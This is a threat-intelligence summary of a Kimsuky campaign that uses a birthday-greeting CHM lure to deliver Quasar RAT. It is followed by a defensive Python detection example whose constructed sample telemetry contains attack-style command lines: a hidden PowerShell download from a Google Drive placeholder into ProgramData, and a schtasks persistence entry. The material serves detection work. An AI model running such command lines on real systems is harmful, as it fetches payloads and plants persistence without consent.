Analysis of the APT-C-55 (Kimsuky) group's attack campaign distributing Quasar RAT using "birthday greetings" as a lure
2023-06-05 • Qihoo360 • Analysis of the attack activities of the APT-C-55 (Kimsuky) organization distributing Quasar RAT under the guise of "birthday greetings" as bait
360 attributes with medium confidence an APT-C-55/Kimsuky campaign that used Korean-language artifacts and a birthday-greeting CHM lure to target South Korea. Execution of the CHM loaded remote VBS and PowerShell stages, created a WindowsAppCertification directory under ProgramData, established a scheduled task, and downloaded additional payloads from Google Drive URLs. The loader, identified internally as ProcessHollowingCsharp, RC4-decrypted Quasar RAT v1.3.0.0 and injected it into CasPol.exe, matching previously reported Kimsuky QuasarRAT activity and related malicious document tradecraft.
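As an added example (not code from the 360 report), the following behaviour-based check runs over constructed process-creation events and flags the stages the summary describes: the CHM launching script stages, the ProgramData\WindowsAppCertification path, scheduled-task creation, a Google Drive download and CasPol.exe hosting an injected payload. The hh.exe parent, the script-host names and schtasks.exe usage are assumptions about how the chain appears in telemetry, not details stated on the page.

```python
# Added example, not the report's code: behavioural detection for the Kimsuky
# chain summarised above, evaluated over constructed process-creation events.
import re
from dataclasses import dataclass, field


@dataclass
class Event:
    parent: str                 # parent process image name
    image: str                  # created process image name
    cmdline: str                # command line of the created process
    hits: list = field(default_factory=list)


# hh.exe (Windows HTML Help host) as CHM parent and the script hosts below are
# assumptions about telemetry; the path, task and CasPol.exe come from the summary.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
EXPECTED_CASPOL_PARENTS = {"devenv.exe", "msbuild.exe"}   # assumed benign parents

RULES = {
    "chm_spawns_script": lambda e: e.parent == "hh.exe" and e.image in SCRIPT_HOSTS,
    "windowsappcertification_path": lambda e: re.search(
        r"programdata\\windowsappcertification", e.cmdline, re.I) is not None,
    "schtasks_create": lambda e: e.image == "schtasks.exe" and "/create" in e.cmdline.lower(),
    "google_drive_download": lambda e: e.image in SCRIPT_HOSTS
        and "drive.google.com" in e.cmdline.lower(),
    "caspol_unexpected_parent": lambda e: e.image == "caspol.exe"
        and e.parent not in EXPECTED_CASPOL_PARENTS,
}


def evaluate(events):
    """Attach the names of every rule each event satisfies."""
    for e in events:
        e.hits = [name for name, check in RULES.items() if check(e)]
    return events


def score(events):
    """Distinct stages observed on one host; several together outweigh any single hit."""
    return {h for e in evaluate(events) for h in e.hits}


# Constructed sample telemetry approximating the described chain (not real IoCs).
SAMPLE = [
    Event("explorer.exe", "hh.exe", "hh.exe birthday.chm"),
    Event("hh.exe", "wscript.exe", "wscript.exe //e:vbs stage1.vbs"),
    Event("wscript.exe", "powershell.exe", "powershell -w hidden iwr https://drive.google.com/"
          "uc?id=PLACEHOLDER -o C:\\ProgramData\\WindowsAppCertification\\a.bin"),
    Event("powershell.exe", "schtasks.exe",
          "schtasks /create /tn Update /tr C:\\ProgramData\\WindowsAppCertification\\a.exe"),
    Event("a.exe", "caspol.exe", "caspol.exe"),
    Event("explorer.exe", "notepad.exe", "notepad.exe notes.txt"),
]

if __name__ == "__main__":
    for ev in evaluate(SAMPLE):
        print(ev.image, ev.hits)
```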
Indicators of Compromise